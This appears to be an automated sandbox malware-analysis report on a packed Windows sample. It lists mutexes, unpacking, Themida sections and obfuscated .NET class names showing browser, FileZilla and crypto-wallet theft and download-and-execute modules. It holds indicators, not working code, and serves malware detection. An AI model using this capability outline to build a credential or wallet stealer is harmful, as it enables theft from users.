Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Mutant created: \Sessions\1\BaseNamedObjects\152138533219352125563209
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_01

Source: C:\Users\user\AppData\Local\Temp\4851.exe	Command line argument: 08A	22_2_00413780
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Command line argument: >?B	33_2_00423E90
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Command line argument: >?B	39_2_00423E90

Source: 26.2.DB3B.exe.13e0000.0.unpack, U6N1K3Psx2gwljehHD/k5qogX5s1uhpglgNhA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 26.2.DB3B.exe.13e0000.0.unpack, U6N1K3Psx2gwljehHD/k5qogX5s1uhpglgNhA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 40.2.Microsoft.exe.950000.0.unpack, o3Wmsh7pFeOtDxNZk7/EKDyW38CpCGLVwh18e.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 40.2.Microsoft.exe.950000.0.unpack, o3Wmsh7pFeOtDxNZk7/EKDyW38CpCGLVwh18e.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\xuTyOmef1g.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: xuTyOmef1g.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\faloy38\vejaxutik\48_xemiwodiriwu\baludo27\jufopawev14\v.pdb source: 4851.exe, 00000016.00000000.337004048.000000000041F000.00000002.00020000.sdmp
Source:	Binary string: C:\legoxep\jumubemum.pdb source: rnyuf.exe, 00000021.00000000.440628773.000000000041F000.00000002.00020000.sdmp, rnyuf.exe, 00000027.00000000.458945682.000000000041F000.00000002.00020000.sdmp
Source:	Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: rnyuf.exe
Source:	Binary string: C:\judutenujutoj\gugabugeh18\ciduke vagaluyex\mayezo13\wani.pdb source: xuTyOmef1g.exe, 00000000.00000000.219452424.000000000041F000.00000002.00020000.sdmp, uwtjrji, 00000012.00000000.311457573.000000000041F000.00000002.00020000.sdmp
Source:	Binary string: _.pdb source: 4851.exe, 00000016.00000002.442859715.00000000029B0000.00000004.00000001.sdmp
Source:	Binary string: 3C:\legoxep\jumubemum.pdb source: rnyuf.exe, 00000021.00000000.440628773.000000000041F000.00000002.00020000.sdmp, rnyuf.exe, 00000027.00000000.458945682.000000000041F000.00000002.00020000.sdmp
Source:	Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: Microsoft.exe, 00000028.00000002.507513112.00000000009D4000.00000040.00020000.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Unpacked PE file: 0.2.xuTyOmef1g.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\uwtjrji	Unpacked PE file: 18.2.uwtjrji.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Unpacked PE file: 26.2.DB3B.exe.13e0000.0.unpack :ER; :W; :R; :R;.idata:W;800-850 :ER;.themida:EW;.boot:ER;.rsrc:R; vs :ER; :W; :R; :R;
Source: C:\Users\user\AppData\Local\Temp\F3D5.exe	Unpacked PE file: 30.2.F3D5.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Unpacked PE file: 33.2.rnyuf.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Unpacked PE file: 39.2.rnyuf.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Unpacked PE file: 40.2.Microsoft.exe.950000.0.unpack .text:ER;.sdata:W; :R;.reloc:R;.idata:W;\| :ER;.themida:EW;.boot:ER;.rsrc:R; vs .text:ER;.sdata:W; :R;.reloc:R;

.NET source code contains method to dynamically call methods (often used by packers)

Show sources

Source: 26.2.DB3B.exe.13e0000.0.unpack, U6N1K3Psx2gwljehHD/k5qogX5s1uhpglgNhA.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 40.2.Microsoft.exe.950000.0.unpack, o3Wmsh7pFeOtDxNZk7/EKDyW38CpCGLVwh18e.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)

Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Code function: 0_2_00402263 push ebp; retf	0_2_0040226F
Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Code function: 0_2_004012DB push ebx; ret	0_2_004012DC
Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Code function: 0_2_024322B3 push ebp; retf	0_2_024322BF
Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Code function: 0_2_0243132B push ebx; ret	0_2_0243132C
Source: C:\Users\user\AppData\Roaming\uwtjrji	Code function: 18_2_00402263 push ebp; retf	18_2_0040226F
Source: C:\Users\user\AppData\Roaming\uwtjrji	Code function: 18_2_004012DB push ebx; ret	18_2_004012DC
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_0041C40C push cs; iretd	22_2_0041C4E2
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_00423149 push eax; ret	22_2_00423179
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_00422900 push cs; ret	22_2_00422906
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_0041C50E push cs; iretd	22_2_0041C4E2
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_004231C8 push eax; ret	22_2_00423179
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_0040E21D push ecx; ret	22_2_0040E230
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_0041C6BE push ebx; ret	22_2_0041C6BF
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_0263B2BC push edi; retf	22_2_0263B2BD
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_02638371 push FFFFFFE1h; ret	22_2_02638380
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_0263B1AF push ecx; iretd	22_2_0263B1B2
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_02A063E0 push es; ret	22_2_02A063F0
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_02A0E500 push es; ret	22_2_02A0E510
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_06B083E0 push es; retn 0004h	22_2_06B08910
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_06B0A4B3 push es; retn 0004h	22_2_06B0A4C0
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_06B04EB0 push es; retn 0004h	22_2_06B04EC0
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_06B04E92 push es; retn 0004h	22_2_06B04EA0
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_06B04EFC push es; retn 0004h	22_2_06B04EC0
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_06B04ED0 push es; retn 0004h	22_2_06B04EE0
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_06B04D88 push es; retn 0004h	22_2_06B04E80
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_06B04D60 push es; retn 0008h	22_2_06B04D70
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_06B08922 push es; retn 0004h	22_2_06B08930
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_06B036B2 push es; ret	22_2_06B036C0
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_06B03690 push es; ret	22_2_06B036A0
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_06B036D2 push es; ret	22_2_06B036E0
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_06B03670 push es; ret	22_2_06B03680

Source: C:\Users\user\Desktop\xuTyOmef1g.exe

Code function: 0_2_0041D340 LoadLibraryA,GetProcAddress,VirtualProtect,

0_2_0041D340

Source: Microsoft[1].exe0.33.dr

Static PE information: 0xE25BA347 [Fri May 5 08:33:11 2090 UTC]

Source: Microsoft[1].exe0.33.dr	Static PE information: section name:
Source: Microsoft[1].exe0.33.dr	Static PE information: section name: \|
Source: Microsoft[1].exe0.33.dr	Static PE information: section name: .themida
Source: Microsoft[1].exe0.33.dr	Static PE information: section name: .boot
Source: Microsoft.exe.33.dr	Static PE information: section name:
Source: Microsoft.exe.33.dr	Static PE information: section name: \|
Source: Microsoft.exe.33.dr	Static PE information: section name: .themida
Source: Microsoft.exe.33.dr	Static PE information: section name: .boot

Source: initial sample

Static PE information: section where entry point is pointing to: .boot

Source: Microsoft.exe.33.dr	Static PE information: real checksum: 0x27e76d should be: 0x280e85
Source: Microsoft[1].exe0.33.dr	Static PE information: real checksum: 0x27e76d should be: 0x280e85

Source: initial sample	Static PE information: section name: \| entropy: 7.99816465985
Source: initial sample	Static PE information: section name: \| entropy: 7.99816465985

Source: 26.2.DB3B.exe.13e0000.0.unpack, Program.cs	High entropy of concatenated method names: 'yXvC7SqAw', 'Execute', 'SeenBefore', '.cctor', 'Wep9lmUqQ9Ww5tqHeap', 'qat3QlUWFMrT6UIZWMu', 'IZXQ1cU2uf1KvlcbFQK', 'bLkELTU1UGZSBwwIh3l', 'Cc00hCUbNc3OfBxvu93', 'CqgV36UBuDky7tv1VJR'
Source: 26.2.DB3B.exe.13e0000.0.unpack, ArmoryRule.cs	High entropy of concatenated method names: '.ctor', 'GetFolder', 'GetScanArgs', 'zc0LYFUDdLDCglLpY0U', 'HlBfhAU9hDSt2Qanf47', 'rApGqrUwXbf0dfqZeb6', 'WqcPmJUys1383JObd8Q', 'hq96h6UiBf9VGQ6T0VQ', 'Rg0iHjUP5d5vbsLwklh', 'QNJgk6U5gGng9ywQ7PO'
Source: 26.2.DB3B.exe.13e0000.0.unpack, EndpointConnection.cs	High entropy of concatenated method names: '.ctor', 'RequestConnection', 'TryGetConnection', 'TryGetArgs', 'TryVerify', 'TryGetTasks', 'TryCompleteTask', 'Dispose', 'Dispose', 'jQNtlcUl00gUQHicV9E'
Source: 26.2.DB3B.exe.13e0000.0.unpack, StringDecrypt.cs	High entropy of concatenated method names: 'xPdIIsA2L', 'ywk0UelW4', 'ShvTAWvqv', 'Decrypt', 'Hv5SAOUAlDoM6mduNTG', 'VBFnh1USutw1N9iheTh', 'giIZsAUUpQ8yiQUCaO9', 'kZax4mU8uqsrl42oIVL', 'rKUci3UTiuDBATPJjxP', 'SVncbBUtlIILaL9OIQf'
Source: 26.2.DB3B.exe.13e0000.0.unpack, CryptoHelper.cs	High entropy of concatenated method names: 'DecryptBlob', 'DecryptBlob', 'GetMd5Hash', 'A8ObmU5bF', 'nsCxBQ0O4BtGgh4VXJ', 'alrgm2HxwfGCRx31UD', 'A2w6XBj5RjZZUyRqfs', 'YZh7ojRpu5CiuE8PMi', 'CYKH59L0HgTTCKPKmL', 'EsfZTizPnISotY3Ot0'
Source: 26.2.DB3B.exe.13e0000.0.unpack, Jx.cs	High entropy of concatenated method names: '.ctor', 'GetFolder', 'GetScanArgs', 'pZ1jUnAvBZmoJfPl0eG', 'mk0xBtA5F58wEAdvOKC', 'XcJf57AxfwOj8Oe3KKy', 'T1V0IqA4krs6W4EGIcy', 'EecyFFAOrWjCEbWytvU', 'gYTPsQAHnhvrMlDIYqN'
Source: 26.2.DB3B.exe.13e0000.0.unpack, CommandLineUpdate.cs	High entropy of concatenated method names: 'IsValidAction', 'Process', '.ctor', 'Gnm2rP8jwDAB9oEtRxu', 'nRD4FH80R6HUef8vj64', 'KRMwex8Rnsy8R5mPUZw', 'AoNS0t8Lgqbkd4oycJ8', 'w0aEkB8zIb46EllmvJC', 'XBp7R0TSQBkOC6xnEAw', 'FV0TOtTUTRyVSHGJjda'
Source: 26.2.DB3B.exe.13e0000.0.unpack, DataBaseConnection.cs	High entropy of concatenated method names: 'get_RowLength', '.ctor', 'ParseValue', 'ParseValue', 'GetRowCount', 'TNYuojDcX', 'qxQkPhfYn', 'ReadTable', 'EOm2iRfkb', 'pf6MEEbe8'
Source: 26.2.DB3B.exe.13e0000.0.unpack, mYDict.cs	High entropy of concatenated method names: '.ctor', 'GetFolder', 'GetScanArgs', 'Sbp3mnAjEhU4UaSRxM2', 'F2MHDtA0XG9rpYsmeOG', 'E7MAlxARdBBTDo2Tr74', 'rkySEOALwkBPxwXiLs3', 'ji4PVlAzFZHvvILAIRC', 'QRYiSd8SZmRG4OqMCo6', 'yoy4eA8USK7fttm6yAR'
Source: 26.2.DB3B.exe.13e0000.0.unpack, ElectrumRule.cs	High entropy of concatenated method names: '.ctor', 'GetFolder', 'GetScanArgs', 'da8x2QAausdxKhpAhic', 'wCDyAeAsCXQ50GsRmHq', 'O22dFjAbxQfiPMrJu3K', 'zO3RlIABaGpmNIkyBif', 'JYvMIsAJSCQiENCkDlC', 'j1gXDGA7Ntr95DGSSTk'
Source: 26.2.DB3B.exe.13e0000.0.unpack, DesktopMessangerRule.cs	High entropy of concatenated method names: 'get_PassedPaths', 'set_PassedPaths', 'GetFolder', 'GetScanArgs', '.ctor', 'QLLgdSAupUSPumSuFED', 'ndda0uAVRyMqtCvjWsE', 'EHv2UPANrgZ9lpXVGxt', 'NtV3bpAeNYBBu1AN4Qm', 'knO56GAXAptJfrX7yp0'
Source: 26.2.DB3B.exe.13e0000.0.unpack, AtomicRule.cs	High entropy of concatenated method names: '.ctor', 'GetFolder', 'GetScanArgs', 'xONnWhU4I0ohK3SRRn6', 'wUpXDFUxK3XqR344iD0', 'zCafNiUv92FE3KLL976', 'MIbN0BUOnGVCiE0dfoT', 'sN7eAuUHUhxZA3336Wf', 'g58E1uUjykCbhROdDfs'
Source: 26.2.DB3B.exe.13e0000.0.unpack, DownloadAndExecuteUpdate.cs	High entropy of concatenated method names: 'IsValidAction', 'Process', '.ctor', 'GcjMCgTA5J2l4koAm7e', 'sVShtGT8F5nXpeqDS3L', 'Bd7qc2TTnmU6C5LpmMt', 'DHVsHnTt8S1uJFGxE25', 'VMRtrXTrVkYSxPT2BfV', 'SZHYfnTQMs16oodihgd', 'Cn8P1NTGMCuOsGynR5Y'
Source: 26.2.DB3B.exe.13e0000.0.unpack, FileCopier.cs	High entropy of concatenated method names: 'OevmdCiLk', 'CreateShadowCopy', 'zLRpxJkwC', 'FindPaths', 'ChromeGetName', 'ChromeGetRoamingName', 'ChromeGetLocalName', 'Dispose', '.ctor', 'WNS0Wptp3OCOauwRe1G'
Source: 26.2.DB3B.exe.13e0000.0.unpack, SystemInfoHelper.cs	High entropy of concatenated method names: 'CreateBind', 'GetProcessors', 'GetGraphicCards', 'GetFirewalls', 'GetBrowsers', 'GetSerialNumber', 'ListOfProcesses', 'GetProcessesByName', 'ListOfPrograms', 'AvailableLanguages'
Source: 26.2.DB3B.exe.13e0000.0.unpack, NativeHelper.cs	High entropy of concatenated method names: 'D42hsnHes', 'ip5tbm87h', 'Sd96RBaKO', 'Hide', 'W4wjfUKdx', 'lSHpG3tmivf5Y5DEQJN', 'gr9ERxtG7TJcYHClVPE', 'uUwvMLtlpt0SuPYkK6X'
Source: 26.2.DB3B.exe.13e0000.0.unpack, GeoHelper.cs	High entropy of concatenated method names: 'Get', 'LC5GlvTRtJu4NmBIfXB', 'NVwJReTLxfgyBX9eyvn', 'soWtciTzpeVQXeeBpmW', 'C2YU5ptSIvOHXvfvkqn', 'dQILSdtUoBZC2Ae8WD7', 'E0ixWqtAR1vK0MyINtP', 'yu4uFQt8L5WOURdYgvx', 'sl2s0JtTvyWuKsIXT1i', 'iE0XK8ttZiAhZSvCV23'
Source: 26.2.DB3B.exe.13e0000.0.unpack, GdiHelper.cs	High entropy of concatenated method names: 'eHRXba6HB', 'GetWindowsScreenScalingFactor', 'MonitorSize', 'Parse', 'UCgvZjfaX', 'uT7SdDTpTfccNVmbWsp', 'yCLM5CTnvjAbkQxPBSW', 'oiagkGTKl6WnK0ahk0P', 'iNKTQJTcwl04cN06Uml', 'sjCRZvT3Fk9jBIJcloC'
Source: 26.2.DB3B.exe.13e0000.0.unpack, RvNhLl9kRicBC2D7Xp/nxpdjH7HX1Aclx0GGi.cs	High entropy of concatenated method names: 'lAfa3odVca', 'CSVaC3lIW3', 'J65a7LaiDC', '.ctor', 'kLjw4iIsCLsZtxc4lksN0j', '.cctor', 'JpKbAOx7odUVXMdM19', 'RWMoNA7b8xP3EN5EZU', 'gOeaLgbxppf2nQNAyg', 'JKCV9aBbBv0jkCFwP0'
Source: 26.2.DB3B.exe.13e0000.0.unpack, U6N1K3Psx2gwljehHD/k5qogX5s1uhpglgNhA.cs	High entropy of concatenated method names: '.cctor', 'u7APtpWqeuXIX', 'JENYTUThPZ', 'Ne6Y3bVStV', 'AdPYCo8t4m', 'nMVY7CnU4a', 'MgvYJaEL4C', 'GV9YGr5GDi', 't9hYoJOpuG', 'ptEYutK0JN'
Source: 26.2.DB3B.exe.13e0000.0.unpack, Ia1AUSW1gdeo1YcWpA/n9VGAiV2nWC8gZCZ89.cs	High entropy of concatenated method names: 'ALpPtpWWM37MA', '.ctor', '.cctor', 'pWRTtrlqEWTtXnMPv2e', 'LwPQmulWYPC7ux703Gt', 'CF9a2xl2ckQAlH0GKCx', 'AjtOkPl11jPsl9vhDOP', 'wJelnUleqGaPbKjn5Ia', 'FwuxRRlXpCoSDZYpmqj', 'C8NhiAlb9iZrlOWG9Wv'
Source: 26.2.DB3B.exe.13e0000.0.unpack, FileZilla.cs	High entropy of concatenated method names: 'Scan', 'MN5eAfXaN', 'TBxDLaMU5', '.ctor', 'ljEoNSNOgyqrrRQIJ7', 'ccNOIpeFfG2C0d8naU', 'kSZwElX8f7rehWLFmn', 'zUg98Vq5ayaBLgwoFS', 'A4QsAqWEdRAfOJWr3D', 'ni8Qw22OY0EZAA4Ogb'
Source: 26.2.DB3B.exe.13e0000.0.unpack, Chr_0_M_e.cs	High entropy of concatenated method names: 'Scan', 'HZFg49PNJ', 'SHcruNBSb', 'ROFYE1KHZ', 'qZqaIVVVI', 'nALB8BiPF', 'MakeTries', 'cJBEYrFcH', 'Wmrtq9QVet37jKQFLM', 'LPprFbGsrdQq6xHYtE'
Source: 26.2.DB3B.exe.13e0000.0.unpack, CryptoProvider.cs	High entropy of concatenated method names: 'BCryptOpenAlgorithmProvider', 'BCryptCloseAlgorithmProvider', 'BCryptGetProperty', 's14AJLm0o', 'BCryptImportKey', 'BCryptDestroyKey', 'BCryptDecrypt', 'Decrypt', 'V45UefXUd', 'XhoyZH7HV'
Source: 40.2.Microsoft.exe.950000.0.unpack, DbFactory.cs	High entropy of concatenated method names: 'get_RowLength', '.ctor', 'GatherValue', 'ReadContextValue', 'GetRowCount', 'sFO2OhQgX', 'FCavP3wj7', 'ReadContextTable', 'ctMx2GZh6', 'tsep69UBd'
Source: 40.2.Microsoft.exe.950000.0.unpack, FileCopier.cs	High entropy of concatenated method names: 'KVwYh18eg', 'CreateShadowCopy', 'FWmnshpFe', 'FindPaths', 'ChromeGetName', 'ChromeGetRoamingName', 'ChromeGetLocalName', 'Dispose', '.ctor', 'V7IbhxWi6Taw2GMKlmc'
Source: 40.2.Microsoft.exe.950000.0.unpack, Resolution.cs	High entropy of concatenated method names: 'NXo0Ec7X8', 'GetWindowsScreenScalingFactor', 'MonitorSize', 'Print', 'B6ILbb0vK', 'flHVLFCiu1BRGhLYyv5', 'QPqFQ1CggqMs3g43G4E', 'Q5NAyMCnUnZQQdqQTbE', 'eLpvTACZmXGys4thIbq', 'jNiEWrCcpniV02WP44w'
Source: 40.2.Microsoft.exe.950000.0.unpack, gNul49wOx2w8q1qAYb/YWrDCF3TP82AHrZsIy.cs	High entropy of concatenated method names: 'dk8SaOnsHY', 'LkgS8VsI3x', 'nfSS7LjGOf', '.ctor', 'kLjw4iIsCLsZtxc4lksN0j', '.cctor', 'qNCxU2IKfgXOxiLFpK', 'I0vbt84mlsHFjlpbNq', 'FIHI6jQtmN3TTsO6cb', 'BtHRL4CwGDZUvkWALN'
Source: 40.2.Microsoft.exe.950000.0.unpack, NativeHelper.cs	High entropy of concatenated method names: 'FgNZQxIn8', 'ijYB9Bp9X', 'DsphfU4Mg', 'Hide', 'Pju9hSCDK', 'MrYaOHWXdYsM0QMWvOT', 'T21W0VWSQ2TB82Pq97u', 'hqGqAsWmZVIv8xBQ9KG', 'Lgtg2SW8ryPiUEmH5wq', 'bMYZXOWAjFowO14YuOo'
Source: 40.2.Microsoft.exe.950000.0.unpack, LocatorAPI.cs	High entropy of concatenated method names: 'Gather', 'TmDOZnWOV7hXylfogVH', 'jcxtn1WCoUIy1vYxLTT', 'vTDw2bWWpJGH9iprKw9', 'lCLnH6W5RxCSo4nSBcW', 'wVX6KYWyVRLDjTsYBfJ', 'lDpFOoWNHG0a12SJmjt', 'odmE9FWbGVlCw9WiWOC', 'KTSnhdWsqgaFgWAE629', 'yPyx8wWf3PCc6vXIXs6'
Source: 40.2.Microsoft.exe.950000.0.unpack, StringDecrypt.cs	High entropy of concatenated method names: 'oNxN7VlyR', 'NA1WZ0FJN', 'fRkt8Qx2E', 'Decrypt', 'HNae1tsx1P2keJ0cRMI', 'TxTVO1ssuK4pOhwbR6J', 'kp5rQZsfpfi2ZxWhMpE', 'bMSVcEh20jMbFOSwu5', 'X7y3gCzvymLb1B2IZW', 'UGtpj0sOilUiYApO8oM'
Source: 40.2.Microsoft.exe.950000.0.unpack, E_x0_d_u_S.cs	High entropy of concatenated method names: '.ctor', 'GetFolder', 'GetScanArgs', 'hk9TuIfa0H2Fy8nnuOs', 'S6UINKf0DAWwffhMyO4', 'p7u9Y8f1FsRqh3itjmi', 'y9O3vdf9C93rkHmkhRG', 'IHZn8XfUWavxhDUSU16', 'KeRip8fL61MDcx5gt90', 'trEY4rfp0LEe3ALatiF'
Source: 40.2.Microsoft.exe.950000.0.unpack, o3Wmsh7pFeOtDxNZk7/EKDyW38CpCGLVwh18e.cs	High entropy of concatenated method names: '.cctor', 'JxhJjOpNZbHnv', 'HG7I4o3nq4', 'ptHIa8beoS', 'boWI8x95F7', 'W4DI75nN71', 'afnIbQUOj8', 'CSvIcWNBiq', 'FWRI2d7VL5', 'ltXIvq18D9'
Source: 40.2.Microsoft.exe.950000.0.unpack, BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO.cs	High entropy of concatenated method names: '.ctor', 'Dispose', '.cctor', 'SXpJTy53h2nuxYoMFGe', 'iShmvr56u8UZvCFyRWC', 'UWHwW85ESAlEDp0lrKN', 'yfq8X35djaaI3U3ChNU', 'Auvs395PsrQBy34AlWN', 'r7P0rD57nnlKglMYAoE', 'yxBexn54dQpwKba2QNs'
Source: 40.2.Microsoft.exe.950000.0.unpack, ResFac.cs	High entropy of concatenated method names: '.cctor', 'sdf9j3nasd', 'dsf9jb', 'LSIDsd2', 'asdkadu8', 'sdfo8n234', 'sdfi35sdf', 'asd44123', 'fdfg9i3jn4', 'sdf934asd'
Source: 40.2.Microsoft.exe.950000.0.unpack, CryptoProvider.cs	High entropy of concatenated method names: 'BCryptOpenAlgorithmProvider', 'BCryptCloseAlgorithmProvider', 'BCryptGetProperty', 'PghiAXA9b', 'BCryptImportKey', 'BCryptDestroyKey', 'BCryptDecrypt', 'Decrypt', 'fETFBwybq', 'l7mCArLqO'
Source: 40.2.Microsoft.exe.950000.0.unpack, g_E_c_?_0.cs	High entropy of concatenated method names: 'TryFind', 'XCwjXsFFi', 'GeckoRoamingName', 'GeckoLocalName', 'DkJHiNuVP7n7fd3Sw6', 'hx6r8l2PHfPb7bdnsg', 'bO5uUpqRwUCs1OnjWU', 'zUkxbpUnHqDUVyZ1o7', 'gjpfUK7VIajmLBY5Kn', 'Nav6Op4EXX71V3uiRi'
Source: 40.2.Microsoft.exe.950000.0.unpack, CommandLineUpdate.cs	High entropy of concatenated method names: 'IsValidAction', 'Process', '.ctor', 'NGtX4BCybwAHVlpTK1t', 'E0q2oYCNuBvYMYusk2C', 'lJZhoqCbXOVML6vsBCA', 'h9RssMC8r6dbCR0fPqe', 'PkvikJCA1k0EWMKlK7n', 'XBKM2GCXUm5hv8WapAZ', 'pwOif9CSc7UGl5mFDlu'
Source: 40.2.Microsoft.exe.950000.0.unpack, AllWallets.cs	High entropy of concatenated method names: 'GetFolder', 'GetScanArgs', '.ctor', 'BS0BYlsGXRJUFgbj8hv', 'gHXAK5sHiuf1qmf0qv9', 'EeWueKsIcTUStM8T8oI', 'OFE5KAsiQ7dQScDGhtv', 'FBJiQwspQTVbyDmLXZQ', 'mANlNJskcUTtya8qsQH', 'fmdnNXsgL9Pg0cDdUbo'
Source: 40.2.Microsoft.exe.950000.0.unpack, Program.cs	High entropy of concatenated method names: 'XSn4u82VB', 'Execute', 'SeenBefore', '.cctor', 'TrwQRusYSZgJGlS7fuL', 'Ay3NwasrD2SrnsZtOcn', 'LSrtIIsTZdYKcMl4nVc', 'FypAvjsdAQ9A5ityaCw', 'qWAKS1sP4J7K7OeSHjn', 'hPWdoEs3KT2Dfp4Yf3T'
Source: 40.2.Microsoft.exe.950000.0.unpack, EL3_K_Tr00M.cs	High entropy of concatenated method names: '.ctor', 'GetFolder', 'GetScanArgs', 'Q97Uh2fvRLkb7530nc1', 'G6ygUnfKNKhmhSoFrMl', 'U9IEqTfByqwuQcULYWp', 'DCOWhyfVC5kdkXmdlYu', 'mOBPxjfol5GpIIQLA6w', 'WQDjacfYOxmsdMa26wC', 'gfkNrSfrEDUQ3h4b28U'
Source: 40.2.Microsoft.exe.950000.0.unpack, SystemInfoHelper.cs	High entropy of concatenated method names: 'CreateBind', 'GetProcessors', 'GetGraphicCards', 'GetBrowsers', 'GetSerialNumber', 'ListOfProcesses', 'GetVs', 'GetProcessesByName', 'ListOfPrograms', 'AvailableLanguages'
Source: 40.2.Microsoft.exe.950000.0.unpack, Eth.cs	High entropy of concatenated method names: '.ctor', 'GetFolder', 'GetScanArgs', 'bN6iIifEoLjMFUPDcUk', 'PPOJxQf7pOxOe2TstGR', 'SxxXpNf3ejwQUQN36IM', 'Yqit0Af6qLxqnt7VyUc', 'cgU6Jkf4Xo3IJVMPcBI', 'jqlw7jfu4rhYR8L0YA1', 'Ft13Y7f2ggxs5UtFBOO'
Source: 40.2.Microsoft.exe.950000.0.unpack, mYDict.cs	High entropy of concatenated method names: '.ctor', 'GetFolder', 'GetScanArgs', 'QQnpQ8Of9EOM5p72Aak', 'Pvo0k2OO8BZSvhdl4oO', 'seMsAoOxreXZhMj349I', 'LpJX3sOsLcIS71XVQf7', 'g0w6roOC6wybaeyExuh', 'vFKmqKOWKTvBnZB1cU9', 'DPlkLOO5hpmWVD1Sq76'
Source: 40.2.Microsoft.exe.950000.0.unpack, Jx.cs	High entropy of concatenated method names: '.ctor', 'GetFolder', 'GetScanArgs', 'Xmb2V5fQG9oOOWIoQaa', 'Ra1dx7fjNLGYnEmdrRl', 'D8AvctfFZDMlZswAoQJ', 'MnehN6fe7twJrgus0ME', 'sLtOAcflsWoHo5tAp78', 'a1dPGOfhw3rB2S6px54', 'KLtSBufz7CmfMHyNvtV'
